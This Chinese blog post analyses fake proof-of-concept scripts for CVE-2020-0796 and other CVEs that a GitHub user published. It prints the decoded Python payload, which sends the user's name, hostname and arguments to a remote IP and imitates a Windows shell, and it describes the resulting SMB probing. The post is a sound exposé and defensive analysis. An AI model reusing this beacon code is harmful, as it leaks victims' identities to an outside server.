专栏首页Timeline Sec揭露 | 国产老硬币l33terman6000的骚操作

揭露 | 国产老硬币l33terman6000的骚操作

0x01 事件起因

昨天早上9点左右逛github时,我发现l33terman6000一次性放出了最近热门的7个漏洞的poc。

0x02 事件经过

兴奋地尝试CVE-2020-0796之后发现,好像可以啊!

仔细一看我发现7个脚本中shellcode完全一样。

Shellcode解码看看。

得到了如下代码:

time.sleep(3)
lhost = os.uname()[1]
command = getpass.getuser() + '@' + (lhost)
args = ' '.join(sys.argv[1:])
ErrorMsg = 'Connection Terminated: (Timeout)'
URL = http://54.184.20.69/poc2.php
PARAMS = {'host':command, 'args':args, 'cve':Bug}
r = requests.get(url = URL, params = PARAMS)
welcome = r.content
if welcome != "":
        rsp = 1
        while rsp != "":
                cmd = raw_input(welcome)
                PARAMS = {'host':command, 'args':cmd, 'cve':Bug}
                r = requests.get(url = URL, params = PARAMS)
                rsp = r.content
                print rsp
                welcome = "C:\WINDOWS\system32>"
time.sleep(10)

发送参数给54.184.20.69/poc2.php, 做的全是和poc2的交互,相当于poc2.php做了http代理。

敲ipconfig之后返回的IP信息在54.184.20.69/ip.txt,其实都是他设置好的。

经过尝试,发现执行dir,whoami,ipconfig都会返回他设置的信息,如果执行其他命令如:ver,shell就会断开。

我是在本地执行的,由于他的poc无法打到我的内网,导致poc2.php中的”真poc”没有触发。于是我在Ubuntu vps上进行实验监听了445端口,还真来东西了。

抓包看看,120.244.60.215来了一堆SMB2请求包,和Ubuntu协商SMB失败。

之后转发内网win10 445端口到Ubuntu vps的445端口,因为他只会访问445端口,怀疑有真CVE-2020-0796poc,之后开始抓poc。

然后我再用假poc去打公网的SMB服务时,执行ipconfig会返回vps地址,网关都换成117.51.142.1,相当逼真。

然后分析SMB流量。

第一个包:协商SMB版本 第二个包:尝试用户名为.密码为空登录 第三个包:尝试对192.168.0.18\IPC$连接 第四个包:再次协商SMB版本 第五个包:尝试SMB匿名登录尝试 第六个包:尝试对192.168.56.20\IPC$连接 怀疑是等待时间太短,之后尝试等待30分钟,vps445端口大概20分钟没流量之后关闭了连接。

可以看到又新增了二个ip来访问SMB,不过还是相同的六次请求,2次实验,共来四个不同ip进行访问,每次指定两个ip去进行IPC$连接。其中发现一个公网ip,其他都是内网ip。

公网ip 62.234.15.3 并没有开SMB服务。

telnet公网ip之后,越来越和poc没有关系了。。。

0x03 最终结论

1、两次使用poc对比

内网使用poc打的话,会返回他设置的54.184.20.69的信息,和你的win10靶机没有任何关系。 公网使用poc打的话,两次实验,共发现4个ip来对靶机进行SMB访问,全是国内ip,每次尝试对两个地址尝试IPC$连接和匿名登录。

本文分享自微信公众号 - Timeline Sec(PaperPenSec),作者:mai-lang-chai

原文出处及转载信息见文内详细说明,如有侵权,请联系 yunjia_community@tencent.com 删除。

原始发表时间:2020-04-23

本文参与腾讯云自媒体分享计划,欢迎正在阅读的你也加入,一起分享。

我来说两句

0 条评论
登录 后参与评论

相关文章

  • phpStudy默认配置致Nginx解析漏洞复现

    phpStudy是一个PHP调试环境的程序集成包。该程序包集成最新的Apache+PHP+MySQL+phpMyAdmin+ZendOptimizer,一次性安...

    Timeline Sec
  • CVE-2020-1947:ShardingSphere RCE 复现

    Apache ShardingSphere(Incubator) 是一套开源的分布式数据库中间件解决方案组成的生态圈,它由Sharding-JDBC、Shard...

    Timeline Sec
  • HW防守|应急溯源分析手册汇总篇

    特征rememberMe 恶意 Cookie rememberMe值构造 前16字节的密钥 -> 后面加入序列化参数 -> AES加密 -> base64编码 ...

    Timeline Sec
  • [PHP]算法-最长公共子串的PHP实现

    陶士涵
  • RMQ——模板

     RMQ(rang minimun/maximun query,区间最佳查询)的主要思想是动态规划。

    用户2965768
  • 最短路算法floyd

    对于0~k,我们分i到j的最短路正好经过顶点k一次和完全不经过顶点k两种情况来讨论。

    饶文津
  • 插入排序

    #include<stdio.h> void InsertSort(int n,int a[]) { int j; for(int i=0;i...

    用户1624346
  • NOIP 2017普及组复赛C/C++详细题解报告

    https://wenku.baidu.com/view/f3fe5a326ad97f192279168884868762cbaebb71.html?from=...

    海天一树
  • 小甲鱼《零基础学习Python》课后笔记(五):闲聊之Python的数据类型

    0.在Python中,int表示整形,那你还记得bool、float和str分别表示什么吗?

    小火柴棒
  • AtCoder Beginner Contest 154

    思路:这个题不是很难,但是我一上去就想要用map,然后就很悲催,map里面人家按照键值给你排序,所以输出的时候会有错!

    用户7727433

扫码关注云+社区

领取腾讯云代金券